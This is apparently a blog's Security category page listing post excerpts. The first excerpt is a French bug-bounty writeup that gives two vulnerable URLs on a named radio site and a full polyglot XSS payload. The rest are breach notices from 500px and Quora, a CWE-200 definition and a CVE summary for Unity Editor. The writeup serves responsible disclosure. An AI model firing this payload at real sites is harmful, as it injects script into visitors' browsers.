Categoría: Security

Security is the degree of resistance to, or protection from, harm. It applies to any vulnerable and valuable asset, such as a person, dwelling, community, nation, or organization.

Double XSS

Découverte d’un double XSS J’ai découvert 2 XSS sur le site toutes-les-radios.fr Chemin : https://toutes-les-radios.fr/podcast/?radio=France%20Inter&name=PAYLOAD Charge : %3C!%27/*!%22/*!\%27/*\%22/*–!%3E%3C/Title/%3C/script/%3E%3CInput%20Type= Text%20Style=position:fixed;top:0;left:0;font-size:999px%20*/;%20Onmouseenter=confirm`OPENBUGBOUNTY`%20//%3E Chemin : https://toutes-les-radios.fr/?name=PAYLOAD&cover=chadafm.jpg&url= http://broadcast.infomaniak.net/chadafm-high.mp3&path=&streamid=&type=other&mtpt= Charge : %3C!%27/*!%22/*!\%27/*\%22/*–!%3E%3C/Title/%3C/script/%3E%3CInput%20Type= Text%20Style=position:fixed;top:0;left:0;font-size:999px%20*/;%20Onmouseenter= confirm`OPENBUGBOUNTY`%20//%3E Note : Voulant les envoyer directement par OpenBugBounty, j’ai reçu ce message A vulnerability on this domain has just been reported by another researcher. Please try again […]

500px was compromised

Our engineering team recently learned of a potential security issue affecting your 500px user account. We are taking this issue extremely seriously and have taken immediate action to address the situation and ensure the protection of our users’ data.

Quora was compromised


We are writing to let you know that we recently discovered that some user data was compromised as a result of unauthorized access to our systems by a malicious third party. We are very sorry for any concern or inconvenience this may cause. We are working rapidly to investigate the situation further and take the appropriate steps to prevent such incidents in the future.

CWE-200

CWE-200 An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information.

CVE-2017-12939

CVE-2017-12939

A Remote Code Execution vulnerability was identified in all Windows versions of Unity Editor, e.g., before 5.3.8p2, 5.4.x before 5.4.5p5, 5.5.x before 5.5.4p3, 5.6.x before 5.6.3p1, and 2017.x before 2017.1.0p4. (CWE-20)